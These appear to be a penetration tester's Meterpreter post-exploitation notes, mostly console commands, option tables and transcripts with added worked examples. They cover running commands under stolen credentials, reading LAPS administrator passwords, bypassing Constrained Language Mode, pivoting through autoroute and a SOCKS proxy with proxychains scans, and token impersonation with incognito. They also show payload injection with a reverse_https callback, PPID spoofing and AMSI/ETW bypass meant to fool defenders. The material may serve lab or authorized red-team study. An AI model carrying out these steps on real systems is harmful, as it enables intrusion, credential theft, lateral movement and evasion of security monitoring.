Backlink: reference-notes-readme
Meterpreter Tips and Tricks
Post Modules in Open Session
Run the post modules below from the meterpreter prompt with: run [module] [OPTION=value ...]. Local exploit modules (exploit/windows/local/...) can also be run from msfconsole after backgrounding the session and setting SESSION, as the autoroute walkthrough further down shows.
Module: post/windows/manage/run_as
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
CMD                        yes       Command to execute
CMDOUT    false            yes       Retrieve command output
DOMAIN                     yes       Domain to login with
PASSWORD                   yes       Password to login with
SESSION                    yes       The session to run this module on
USER                       yes       Username to login with
Module: post/windows/manage/run_as_psh
Name         Current Setting  Required  Description
----         ---------------  --------  -----------
ARGS                          no        Arguments
CHANNELIZE   true             yes       Channelize output, required for reading output or interacting
DOMAIN                        no        Domain of user
EXE          cmd.exe          yes       Executable to run
HIDDEN       true             yes       Hide the window
INTERACTIVE  true             yes       Run interactively
PASS                          yes       Password of user
PATH         C:\              yes       Working Directory
SESSION                       yes       The session to run this module on
USER                          yes       User to run executable as
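Added example (not from the original notes) of invoking both modules from the meterpreter prompt with the run [module] [opts] syntax. The domain, user, password and command are placeholders taken from the incognito output later on this page; substitute the credentials you actually hold. Both modules need the account's plaintext password, unlike incognito token impersonation, which does not. DOMAIN is required by run_as; for a local account pass the computer name (or "." per the underlying Windows logon API, an assumption not stated in the module options). Single quotes keep the backslashes and spaces intact through the console's tokenizer.

```console
meterpreter > run post/windows/manage/run_as DOMAIN=TRICKY USER=sqlsvc PASSWORD='<password>' CMD='cmd.exe /c whoami /all' CMDOUT=true
meterpreter > run post/windows/manage/run_as_psh DOMAIN=TRICKY USER=sqlsvc PASS='<password>' EXE=cmd.exe ARGS='/c whoami /all' PATH='C:\Windows\Temp' HIDDEN=true CHANNELIZE=true
```

With CMDOUT=true, run_as returns the command's output to the console; run_as_psh with CHANNELIZE=true returns a channel, so the output can be read back (or interacted with via the channel commands) rather than being lost in a hidden window. Both run the new process under a fresh logon session for the named user, so the commands execute with that user's rights, not the session's current token.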
Module: post/windows/manage/archmigrate
The default options work as-is. The module checks whether the Meterpreter architecture matches the OS architecture and, if not (for example a 32-bit Meterpreter on 64-bit Windows), spawns a process of the native architecture and migrates into it.
Module: exploit/windows/local/payload_inject
Name         Current Setting  Required  Description
----         ---------------  --------  -----------
AUTOUNHOOK   false            no        Auto remove EDR hooks
PID          0                no        Process Identifier of the process to inject the payload into (0 = new process)
PPID         0                no        Process Identifier for PPID spoofing when creating a new process (0 = no PPID spoofing)
SESSION                       yes       The session to run this module on
WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed
Payload options (windows/x64/meterpreter/reverse_https):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     0.0.0.0          yes       The local listener hostname
LPORT     443              yes       The local listener port
LURI                       no        The HTTP Path
Exploit target:
Id  Name
--  ----
0   Windows
Module: post/windows/gather/credentials/enum_laps
Enumerates LAPS-managed local administrator passwords from Active Directory (the ms-Mcs-AdmPwd attribute) for computer objects the session's user is permitted to read; run it once a domain-user session is available.
Module: powershell
load powershell
Use the above command to load the powershell extension into the session.
powershell_shell
Use the above command to open an interactive PowerShell shell. The extension hosts a PowerShell runspace inside the Meterpreter process instead of launching powershell.exe, so the shell is normally not subject to Constrained Language Mode (CLM) restrictions that an AppLocker/WDAC policy applies to a regular PowerShell session; confirm the language mode before relying on that.
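Added check (not from the original notes) for the CLM claim above, plus the extension's import command. The script path and the Invoke-Something function are hypothetical placeholders for whatever tooling you carry.

```console
meterpreter > load powershell
meterpreter > powershell_execute '$ExecutionContext.SessionState.LanguageMode'
meterpreter > powershell_import /opt/tools/Invoke-Something.ps1
meterpreter > powershell_execute 'Invoke-Something -Verbose'
meterpreter > powershell_shell
```

If the first powershell_execute prints FullLanguage, the runspace is unrestricted and imported scripts run normally. If it prints ConstrainedLanguage, the lockdown policy is being enforced inside this process too (the PowerShell engine applies it regardless of host) and the bypass does not hold on that machine; fall back to execute_dotnet_assembly or another approach rather than assuming the extension got around it.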
Module: multi/manage/autoroute
c:\Users\will>^Z
Background channel 1? [y/N] y
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > use multi/manage/autoroute
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf6 post(multi/manage/autoroute) > set session 2
session => 2
msf6 post(multi/manage/autoroute) > exploit
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running module against CLIENT09
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.76.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
The sequence above backgrounds the session, adds a route for every subnet found in the host's routing table, and starts a SOCKS proxy that tunnels traffic matching those routes through session 2 (defaults: SRVPORT 1080, VERSION 5). The session-compatibility warning is only advisory; the route was still added, as the output shows. Setting srvhost to 127.0.0.1 matters: the default of 0.0.0.0 would expose the unauthenticated proxy, and with it the pivot into the target network, to anyone who can reach the attacking host.
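Added follow-up (not from the original notes) showing how to verify the pivot and then use it from a second terminal with proxychains. The target 172.16.76.10 is an assumed host inside the subnet the route covers; the config path is the Debian/Kali default for proxychains4.

```console
msf6 auxiliary(server/socks_proxy) > route print
msf6 auxiliary(server/socks_proxy) > jobs
msf6 auxiliary(server/socks_proxy) > show options

$ sudo sh -c 'echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf'   # match SRVHOST/SRVPORT/VERSION
$ proxychains4 -q nmap -sT -Pn -n -p 445,3389 172.16.76.10              # TCP connect scan only
```

route print should list 172.16.76.0/255.255.255.0 against session 2; if it does not, the proxy will hand connections to the local network instead. A SOCKS pivot only carries TCP connect() traffic, so scans must use -sT, skip host discovery (-Pn) and skip DNS (-n); SYN scans, ICMP and UDP will silently produce wrong results through the tunnel.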
Module: incognito
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter > use incognito
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT SERVICE\SQLTELEMETRY$SQLEXPRESS
SQL05\setup
TRICKY\sqlsvc
Window Manager\DWM-1
Impersonation Tokens Available
========================================
No tokens available
meterpreter > impersonate_token TRICKY\\sqlsvc
[+] Delegation token available
[+] Successfully impersonated user TRICKY\sqlsvc
meterpreter > getuid
Server username: TRICKY\sqlsvc
Module: post/windows/manage/execute_dotnet_assembly
Module options (post/windows/manage/execute_dotnet_assembly):
Name            Current Setting  Required  Description
----            ---------------  --------  -----------
AMSIBYPASS      true             yes       Enable AMSI bypass
ARGUMENTS                        no        Command line arguments
DOTNET_EXE                       yes       Assembly file name
ETWBYPASS       true             yes       Enable ETW bypass
PID             0                no        PID to inject
PPID            0                no        Process Identifier for PPID spoofing when creating a new process (0 = no PPID spoofing)
PROCESS         notepad.exe      no        Process to spawn
SESSION                          yes       The session to run this module on
Signature       Automatic        yes       The Main function signature (Accepted: Automatic, Main(), Main(string[]))
USETHREADTOKEN  true             no        Spawn process with thread impersonation
WAIT            10               no        Time in seconds to wait
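Added example (not from the original notes) covering both payload_inject from the section above and execute_dotnet_assembly, since they share the PID/PPID spawn-and-spoof options. The explorer.exe PID 4212, the listener address 10.10.14.5 and the assembly path /opt/tools/Seatbelt.exe are assumed values; take the real parent PID from ps in the session.

```console
meterpreter > ps -S explorer.exe
meterpreter > bg
msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
msf6 exploit(windows/local/payload_inject) > set SESSION 2
msf6 exploit(windows/local/payload_inject) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf6 exploit(windows/local/payload_inject) > set LHOST 10.10.14.5
msf6 exploit(windows/local/payload_inject) > set LPORT 8443
msf6 exploit(windows/local/payload_inject) > set PID 0
msf6 exploit(windows/local/payload_inject) > set PPID 4212
msf6 exploit(windows/local/payload_inject) > run

msf6 exploit(windows/local/payload_inject) > sessions -i 2
meterpreter > run post/windows/manage/execute_dotnet_assembly DOTNET_EXE=/opt/tools/Seatbelt.exe ARGUMENTS='-group=system' PROCESS=notepad.exe PPID=4212 WAIT=30
```

With PID=0 both modules create a new process and, because PPID is set, report explorer.exe as its parent, which is what a defender looking at parent-child chains expects for a user-launched program. payload_inject starts its own handler for the payload it injects; because the original session already uses a handler on 443, pick a different LPORT as above or set DisablePayloadHandler true to reuse the existing one. For execute_dotnet_assembly, raise WAIT above the default 10 seconds for tools that run long, otherwise output is cut off, and note that USETHREADTOKEN=true (the default) spawns the process with the session's current impersonated token, so it works as the impersonated user after an incognito impersonate_token.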
That's it.